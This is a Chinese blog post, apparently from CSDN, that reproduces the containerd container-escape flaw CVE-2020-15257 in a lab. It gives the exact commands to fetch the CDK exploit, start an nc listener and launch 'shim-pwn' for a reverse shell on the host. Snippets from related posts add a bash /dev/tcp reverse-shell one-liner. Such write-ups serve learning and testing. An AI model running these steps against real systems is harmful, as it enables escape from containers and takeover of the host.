执行容器内的shell_Docker容器逃逸漏洞复现(CVE-2020-15257)

最新推荐文章于 2023-03-27 18:14:03 发布
最新推荐文章于 2023-03-27 18:14:03 发布
阅读量253 收藏 1
点赞数
文章标签: 执行容器内的shell
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_31014131/article/details/112684612
版权

d95d93ea739ffde0e3e989ea5405b365.png

一、漏洞介绍

漏洞原理

Containerd 是一个控制 runC 的守护进程,提供命令行客户端和API,用于在一个机器上管理容器。当在docker使用–net=host参数启动,与宿主机共享net namespace时,容器中的攻击者可以绕过访问权限访问 containerd 的控制API 进而导致权限提升,从而实现Docker容器逃逸。

Containerd是行业标准的容器运行时,可作为Linux和Windows的守护程序使用。在版本1.3.9和1.4.3之前的容器中,容器填充的API不正确地暴露给主机网络容器。填充程序的API套接字的访问控制验证了连接过程的有效UID为0,但没有以其他方式限制对抽象Unix域套接字的访问。这将允许在与填充程序相同的网络名称空间中运行的恶意容器(有效UID为0,但特权降低)导致新进程以提升的特权运行。

影响版本

containerd < 1.4.3

containerd < 1.3.9

实验环境:

被攻击机(ubuntu)ip:192.168.163.129

被攻击机containerd版本:1.2.6

攻击机(kali)ip:192.168.163.131

POC下载:https://github.com/Xyntax/CDK/releases/tag/0.1.6

二、环境介绍

01

被攻击机查看docker版本,显示Containerd Version : 1.2.6

命令:docker version

539df79ba95e671421f86c6ebb198f7d.png

02

为了区分被攻击机的真实环境和被攻击机的docker环境分别在/root目录下面创建不同文件

被攻击机的docker环境:docker环境下面的/root目录下面没有文件,为了便于区分,复制一个dockerfile文件到/root目录下

b409be862d184b99cc17a0ce2fa6d91e.png

被攻击机的真实环境:真实环境下面的/root目录放置了一个true文件

36e94d0e8a5262e96ac05f6dd161e668.png

三、漏洞复现

01

被攻击机真实环境中列出被攻击机的容器

命令:docker ps

63160f1479a3af511414e5ff4edbfdc3.png

02

被攻击机以共享主机网络的方式启动容器,并且直接进入了docker容器

通过 --net=host 作为启动参数来运行一个容器(此处为了方便直接选择已经存在的容器vulhub/activemq:5.11.1,但是会单独再建立了一个容器,不会再下拉镜像,但是两个容器不相关)

命令:docker run -it --net=host vulhub/activemq:5.11.1 /bin/bash

fb8517e2d86bd8f29befe0fee391d46e.png

03

被攻击机真实环境中列出被攻击机的容器列表,刚刚我们新建的容器为container id : 4ad4f620e6a5

命令:docker ps

ed6f5ed3bf709c055f98a3af0faa162c.png

04

在被攻击机docker容器中执行命令,可看到抽象命名空间Unix域套接字

命令:cat /proc/net/unix|grep -a "containerd-shim"

原理备注:containerd->containerd-shim->runc 的通信模型中,containerd-shim的接口作为abstract unix socket暴露,在docker使用--net=host参数启动、与宿主机共享net namespace时,其中的unix socket可以被容器内部访问到,容器中攻击者通过该socket可以通过API控制下游runc进程启动新的恶意镜像,并通过该镜像逃逸。

bb605c7ebb64f27bf90a566b676a214b.png

05

为了方便查看,被攻击机的docker环境下切换到/tmp目录下面进行操作。下载对应的poc并且进行解压操作。

下载poc命令:wget https://github.com/Xyntax/CDK/releases/download/0.1.6/cdk_v0.1.6_release.tar.gz

解压poc命令:tar -zxvf cdk_v0.1.6_release.tar.gz

6de7e113f53bf6e4335fe0a4c86e649e.png

5c3eade7ef8e262d303f864bc927dbcd.png

06

kali攻击机开启监听端口12345

命令:nc -lvp 12345

d1c10cda6b352cc8b056c66f277aac46.png

07

被攻击机的docker环境中执行命令,利用poc建立起连接

命令:./cdk_linux_386 run shim-pwn 192.168.163.131 12345

f000dca388d3dc7304daa82c15323f6f.png

08

Kali攻击机成功获取了被攻击机真实环境的反弹shell(从/root目录下的文件可看出反弹的为真实主机的shell)

3b55cacf299d22f74d452061c6ae25d9.png

备注:

本实验存在很多注意事项(只限于本人实验过程中的坑):

1、本来想使用vulhub的s2-032环境漏洞,利用Struts2工具远程命令执行进行docker逃逸,发现执行命令:cat /proc/net/unix|grep -a "containerd-shim"时无法看到抽象命名空间Unix域套接字,执行poc的时候显示Cannot find vulnerable socket(我使用的是docker exec -it 6970bdddacc6 /bin/bash进入的docker环境 )

2、注意利用--net=host新建容器的时候image名字是相同的,注意区分,否则执行的命令会进入另外一个容器

3、此利用条件是完全控制了被攻击机的docker容器的环境下执行的,利用被攻击机的docker环境控制被攻击机的真实环境。

原文链接

Chace Xie
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
漏洞复现Docker runC 容器逃逸漏洞(CVE-2019-5736)
做自己喜欢的事,并将其发挥到极致!
12-09 5272
2019年2月11日,runC的维护团队报告了一个新发现的漏洞,SUSE Linux GmbH高级软件工程师Aleksa Sarai公布了影响Docker, containerd, Podman, CRI-O等默认运行时容器runc的严重漏洞CVE-2019-5736。漏洞会对IT运行环境带来威胁,漏洞利用会触发容器逃逸、影响整个容器主机的安全,最终导致运行在该主机上的其他容器被入侵。漏洞影响AWS, Google Cloud等主流云平台。日前,该容器逃逸漏洞的PoC利用代码已在GitHub上公布。
容器逃逸Docker runc(CVE-2019-5736)漏洞复现与分析
最新发布
SHELLCODE_8BIT的博客
08-08 1043
【代码】Docker runc(cve-2019-5736)漏洞复现与分析。
Docker 容器逃逸漏洞 (CVE-2020-15257)复现
玄道的网安博客
12-27 1303
漏洞概述 containerd是行业标准的容器运行时,可作为Linux和Windows的守护程序使用。在版本1.3.9和1.4.3之前的容器中,容器填充的API不正确地暴露给主机网络容器。填充程序的API套接字的访问控制验证了连接过程的有效UID为0,但没有以其他方式限制对抽象Unix域套接字的访问。这将允许在与填充程序相同的网络名称空间中运行的恶意容器(有效UID为0,但特权降低)导致新进程以提升的特权运行。 影响版本 containerd < 1.4.3 containe...
Docker反弹shell
Fly_鹏程万里
12-27 2000
文章前言 本篇文章我们主要介绍一些在Docker中反弹shell到远程服务器的方法 常见方法 Step 1:在远程服务器端监听端口 nc -lnvp 9999 Step 2:通过CDK反弹shell #命令格式 cdk run reverse-shell <ip>:<port> #使用实例 cdk run reverse-shell 192.168.17.143:9999 Step 3:成功获取到shell 其他技巧 我们还可以使用反引号...
docker未授权访问反弹shell
giaogiao123的博客
07-23 537
标题docker未授权访问反弹shell 首先我们要扫描端口“2375“ 发现目标端口2375开放,尝试访问ip:2375/version 目标靶机ip:192.168.30.101 (cente os 7) 攻击kali ip: 192.168.30.100 (kali2020.3) 访问出现版本泄露而且2375端口开放说明有未授权访问漏洞 在kali上开启监听1111端口 **nc -lvp 1111** 输入以下命令 ip为目标ip docker -H tcp://192.168.30.10
容器内反弹shell的51种姿势
帮助别人等于帮助自己 ——MXi4oyu
11-19 1373
什么是反弹shell? 反弹shell(reverse shell),就是控制端监听在某TCP/UDP端口,被控端发起请求到该端口,并将其命令行的输入输出转到控制端。reverse shell与telnet,ssh等标准shell对应,本质上是网络概念的客户端与服务端的角色反转。 为什么要反弹shell? 通常用于被控端因防火墙受限、权限不足、端口被占用等情形。 举例:假设我们攻击了一台机器,打开了该机器的一个端口,攻击者在自己的机器去连接目标机器(目标ip:目标机器端口),这是比较常规的形式,我们叫做正向
反弹shell方法
s0mor
08-16 701
Linux: hacker: 192.168.188.63 (kali) 目标: 192.168.72.130 (ubuntu) kali: 监听指定端口: nc -lvp 1234 ubuntu: 反弹shell 方法一 bash: bash -i >& /dev/tcp/192.168.188.63/1234 0>&1 方法二 python: ...
Docker容器逃逸漏洞复现(CVE-2020-15257)
m0_48520508的博客
01-26 694
0x00简介 containerd是容器虚拟化技术,从docker中剥离出来,形成开放容器接口(OCI)标准的一部分。docker容器的管理和操作基本都是通过containerd完成的。Containerd 是一个工业级标准的容器运行时,它强调简单性、健壮性和可移植性。Containerd 可以在宿主机中管理完整的容器生命周期:容器镜像的传输和存储、容器执行和管理、存储和网络等。Containerd 负责干下面这些事情: •管理容器的生命周期(从创建容器到销毁容器) •拉取/推送容器镜像 •存储管理(管
Docker逃逸--runc容器逃逸漏洞(CVE-2019-5736)
热门推荐
07-26 2万+
漏洞简述: 攻击者可以通过特定的容器镜像或者exec操作可以获取到宿主机的runc执行时的文件句柄并修改掉runc的二进制文件,从而获取到宿主机的root执行权限。 利用条件: Docker版本 < 18.09.2,runc版本< 1.0-rc6。(在Docker 18.09.2之前的版本中使用了的runc版本小于1.0-rc6。) 可通过 dockerdocker-r...
CVE-2017-12149JBOSSas6.X反序列化(反弹shell版)
08-08
CVE-2017-12149 JBOSS as 6.X反序列化(反弹shell版)
跨机器远程执行docker 命令
liurizhou的博客
03-01 1341
场景: A机器上起了docker images, 需要提供给他人进行debug,但是又不想提供A机器的账户和密码,该如何让他人远程进入到docker 容器中进行debug呢? # A机器IP为10.10.10.10,容器id为jfd3432456,只需要在其他机器上执行docker -H 10.10.10.10:4243 exec -it jfd3432456 bash ...
【首发】CVE-2020-15257 容器逃逸漏洞复现与解析附Poc
爱国小白帽
12-05 3080
漏洞简介 containerd是行业标准的容器运行时,可作为Linux和Windows的守护程序使用。在版本1.3.9和1.4.3之前的容器中,容器填充的API不正确地暴露给主机网络容器。填充程序的API套接字的访问控制验证了连接过程的有效UID为0,但没有以其他方式限制对抽象Unix域套接字的访问。这将允许在与填充程序相同的网络名称空间中运行的恶意容器(有效UID为0,但特权降低)导致新进程以提升的特权运行。 影响版本 containerd < 1.4.3 containerd < 1.3.9
CVE-2020-15257 Docker 容器逃逸复现
weixin_45260839的博客
07-15 1076
CVE-2020-15257 Docker 容器逃逸复现
Jenkins远程命令执行漏洞 CVE-2018-1000861 漏洞复现
ADummy的博客
03-04 562
Jenkins远程命令执行漏洞CVE-2018-1000861) by ADummy 0x00利用路线 ​ 直接url执行 0x01漏洞介绍 ​ Jenkins使用Stapler框架开发,其允许用户通过URL PATH来调用一次public方法。由于这个过程没有做限制,攻击者可以构造一些特殊的PATH来执行一些敏感的Java方法。 通过这个漏洞,我们可以找到很多可供利用的利用链。其中最严重的就是绕过Groovy沙盒导致未授权用户可执行任意命令:Jenkins在沙盒中执行Groovy前会先检查脚本是
Docker容器逃逸漏洞复现CVE-2020-15257
weixin_45006525的博客
04-28 617
Docker容器逃逸漏洞复现CVE-2020-15257漏洞简介 containerd是行业标准的容器运行时,可作为Linux和Windows的守护程序使用。在版本1.3.9和1.4.3之前的容器中,容器填充的API不正确地暴露给主机网络容器。填充程序的API套接字的访问控制验证了连接过程的有效UID为0,但没有以其他方式限制对抽象Unix域套接字的访问。这将允许在与填充程序相同的网络名称空间中运行的恶意容器(有效UID为0,但特权降低)导致新进程以提升的特权运行。 影响版本 containerd &
技术干货 | Docker 容器逃逸案例汇集
08-02 2万+
当获得一个Webshell,我们的攻击点可能处于服务器的一个虚拟目录里,一台虚拟机或是一台物理机,甚至是在一个Docker容器里。 假设,我们获取的Webshell就处于Docker容器里,那么,我们该如何破局呢? Docker 容器逃逸案例: 1、判断是否处于docker容器里 2、配置不当引起的逃逸 Docker Remote API 未授权访问 docker.s...
Docker 逃逸 漏洞复现
Jack_chao_的博客
03-27 1314
CVE-2020-15257-host模式容器逃逸漏洞分析
【云原生渗透】- docker runc容器逃逸漏洞(CVE-2019-5736)
神棍之路
01-11 1335
运行时存在安全漏洞,攻击者可以通过特定的容器镜像或者exec操作,来获取到宿主机的runc执行时的文件句柄,并修改掉runc的二进制文件,从而可以在宿主机上以root身份执行命令。containerd 向下通过 containerd-shim 结合 runC,使得引擎可以独立升级,避免之前 Docker Daemon 升级会导致所有容器不可用的问题。将该payload拷贝到docker容器中(这就是模拟攻击者获取了docker容器权限,在容器中上传payload进行docker逃逸
Weblogic RCE漏洞CVE-2020-14882&14883:复现与影响版本解析
近期,两个关键性漏洞 CVE-2020-14882 和 CVE-2020-14883 被发现,这些漏洞的存在使得未经授权的远程攻击者能够通过精心构造的GET请求,在受影响的Weblogic Server上执行任意代码。这两个漏洞影响了多个版本,包括...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值